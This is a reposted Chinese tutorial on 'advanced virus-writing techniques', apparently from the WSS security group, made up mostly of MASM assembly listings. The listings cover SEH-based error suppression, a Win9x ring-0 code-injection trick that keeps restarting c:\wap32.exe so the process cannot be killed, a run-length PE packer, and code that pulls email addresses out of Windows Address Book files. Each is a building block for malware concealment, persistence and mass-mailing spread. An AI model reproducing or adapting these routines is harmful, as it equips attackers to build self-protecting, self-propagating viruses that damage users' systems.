病毒的高级编写技巧
     3、 Windows 9x/2000 意外处理通用程序

此段程序可以达到屏蔽程序错误的效果

include wap32.inc

.386p
.model flat,stdcall

extrn MessageBoxA: proc
extrn ExitProcess: proc

.data

Msg db "Fuck",0

SetSehFrame: ;ecx=忽略错误继续执行地址
pop eax ;弹出返回地址
push ecx ;保存忽略错误继续执行地址
call PushExceptionProc
jmp short Exception
PushExceptionProc:
push fs:dword ptr[0]
mov fs:[0],esp
call GetEspAddr
push D [edx] ;保存原Esp地址值
mov [edx],esp
jmp eax
ClearSehFrame:
pop eax ;弹出返回地址
call GetEspAddr
mov esp,[edx]
pop D [edx] ;恢复原Esp地址值
pop fs:dword ptr[0]
pop ecx
pop ecx ;弹出忽略错误继续执行地址
jmp eax

Exception proc pRecord,pFrame,pContext,pDispatch
call PushSehBackProc
call ClearSehFrame
jmp ecx
PushSehBackProc:
pop ecx
mov eax,pContext
mov [eax.cx_Eip],ecx
xor eax,eax ;忽略错误继续执行
ret
Exception endp

GetEspAddr:
call PushOffsetEspAddr
dd ?
PushOffsetEspAddr:
pop edx
ret

.code

Start:
call PushErrorProc
call MessageBoxA,0,offset Msg,offset Msg,0
ret
PushErrorProc:
pop ecx
call SetSehFrame
mov ds:[0],eax
call ClearSehFrame
ret

end Start

4、Windows 9x 下进程不死术

此段程序首先实现Win9x下注射远程线程（新技术）
然后与Win2k下进程不死术一样了。
include Win32.inc

.386p
.model flat,stdcall

extrn GetProcAddress: proc
extrn WinExec: proc
extrn MessageBoxA: proc
extrn Sleep: proc
extrn GetCurrentProcessId: proc
extrn OpenProcess: proc
extrn GetCurrentProcess: proc
extrn WriteProcessMemory: proc
extrn GetExitCodeProcess: proc

.data

;问题,要Sleep()这样做使Kernel32有机会更新数据
KnlThread proc ProcID:dword
call GetKnlOpenProcess
KnlOpenProcess dd ?
GetKnlOpenProcess:
pop eax
call [eax],PROCESS_ALL_ACCESS,FALSE,ProcID
or eax,eax
jz short ExitProtectProc
mov ebx,eax
call GetKnlWaitForSingleObject
KnlWaitForSingleObject dd ?
GetKnlWaitForSingleObject:
pop eax
call [eax],ebx,-1h
call GetFileNameAddress
GetFileNameAddress:
pop ecx
add ecx,offset FileName-offset GetFileNameAddress
call GetKnlWinExec
KnlWinExec dd ?
GetKnlWinExec:
pop eax
call [eax],ecx,01
ExitProtectProc:
ret
KnlThread endp

FileName db "c:\wap32.exe",0

KnlOpenProcessStr db "OpenProcess",0
KnlWaitForObjectStr db "WaitForSingleObject",0
KnlWinExecStr db "WinExec",0
KnlSleepStr db "Sleep",0
KnlCreateKnlThreadStr db "CreateKernelThread",0

.code

Start:
call GetProcAddress,0bff70000h,offset KnlOpenProcessStr
mov KnlOpenProcess,eax
call GetProcAddress,0bff70000h,offset KnlWaitForObjectStr
mov KnlWaitForSingleObject,eax
call GetProcAddress,0bff70000h,offset KnlWinExecStr
mov KnlWinExec,eax

call MoveDataToKnl,offset Start,0bff70600h,100h

call GetProcAddress,0bff70000h,offset KnlCreateKnlThreadStr
mov ebx,eax
call GetCurrentProcessId
push eax
call ebx,0,0,0bff70000h+600h,eax,0,esp
pop eax
call MessageBoxA,0,offset FileName,offset FileName,0
ret

MoveDataToKnl proc uses ebx esi edi,Src:dword,Des:dword,nCx:dword
push eax
sidt [esp-2]
pop eax
add eax,3*8
mov ebx,[eax]
mov edx,[eax+4]
call SetIdt03
pushad
mov [eax],ebx
mov [eax+4],edx
cld
rep movsb
popad
iret
SetIdt03:
cli
pop W[eax]
pop W[eax+6]
mov esi,Src
mov edi,Des
mov ecx,nCx
int 3;
sti
ret
MoveDataToKnl endp

end Start

5、简单算法，高效率压缩PE文件

.586p
.model flat,STDCALL
.data

OldFile db "pe.exe",0
NewFile db "pe.zzz",0

FileData db 0,0
.code
extrn _lopen: proc,_lcreat: proc
extrn _lread: proc,_lwrite: proc
extrn _lclose: proc
extrn ExitProcess: proc
start:
call _lopen,offset OldFile,0
cmp eax,-1
jz ExitProc
mov esi,eax
call _lcreat,offset NewFile,0
cmp eax,-1
jz CloseOldFile
mov edi,eax

xor ebx,ebx
ReadData:
call _lread,esi,offset FileData,1
or eax,eax
jz short ReadOver
movzx eax,FileData
or eax,eax
jnz short NoZero
inc ebx
cmp ebx,0ffh
jnz short ReadData
xor eax,eax
mov ah,bl
xchg ax,word ptr FileData
call _lwrite,edi,offset FileData,2
xor ebx,ebx
jmp short ReadData
NoZero:
or ebx,ebx
jnz short NoZeroData
call _lwrite,edi,offset FileData,1
jmp short ReadData
NoZeroData:
push eax
xor eax,eax
mov ah,bl
mov word ptr FileData,ax
call _lwrite,edi,offset FileData,2
xor ebx,ebx
pop eax
mov FileData,al
call _lwrite,edi,offset FileData,1
jmp ReadData
ReadOver:
or ebx,ebx
jz short CloseFile
xor eax,eax
mov ah,bl
xchg ax,word ptr FileData
call _lwrite,edi,offset FileData,2
xor ebx,ebx
CloseFile:
call _lclose,edi
CloseOldFile:
call _lclose,esi
ExitProc:
call ExitProcess,0

end start

6、提取Windows地址薄文件（*.WAB）的Email信息

.586p
.model flat,STDCALL
.data

MailFile db "My.WAB",0

.code

extrn _lopen: proc,_lcreat: proc
extrn _lread: proc,_lwrite: proc
extrn _llseek: proc
extrn _lclose: proc
extrn MessageBoxA: proc
extrn ExitProcess: proc
extrn WideCharToMultiByte: proc

start:
call _lopen,offset MailFile,0
cmp eax,-1
jz short ExitProc
mov ebx,eax
sub esp,100h
mov edi,esp
call _lread,ebx,edi,100h
cmp eax,100h
jnz short CloseFile
mov eax,[edi+60h] ;得到Unicode邮件名偏移
call _llseek,ebx,eax,0
mov ecx,[edi+64h] ;得到Unicode邮件名个数
ContWabMail:
push ecx
call _lread,ebx,edi,44h ;读一个记录
cmp eax,44
sub esp,100h
mov eax,esp
call WideCharToMultiByte,0,200h,edi,-1,eax,100h,0,0
mov eax,esp
call MessageBoxA,0,eax,eax,0
add esp,100h
pop ecx
loop short ContWabMail
CloseFile:
call _lclose,ebx
ExitProc:
call ExitProcess,0

end start

WSS(Whitecell Security Systems)，一个非营利性民间技术组织，致力于各种系统安全技术的研究。坚持传统的hacker精神，追求技术的精纯。
WSS 主页： http://www.whitecell.org/
WSS 论坛： http://www.whitecell.org/forum/ （完）

文章转载地址：http://www.cnpaf.net/Class/Virus/05122020353949656225.htm